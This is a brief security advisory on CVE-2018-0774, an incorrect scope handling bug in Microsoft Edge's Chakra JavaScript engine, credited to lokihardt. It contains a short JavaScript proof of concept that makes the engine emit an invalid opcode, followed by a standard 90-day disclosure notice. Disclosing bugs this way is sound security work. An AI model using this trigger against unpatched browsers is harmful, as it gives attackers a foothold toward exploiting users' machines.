Microsoft Edge Chakra suffers from an incorrect scope handling vulnerability.
f9aa042a0c635706708db62651d0068aMicrosoft Edge: Chakra: Incorrect scope handling
CVE-2018-0774
PoC:
(function func(arg = function () {
print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
print(func);
function func() {
}
})();
Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt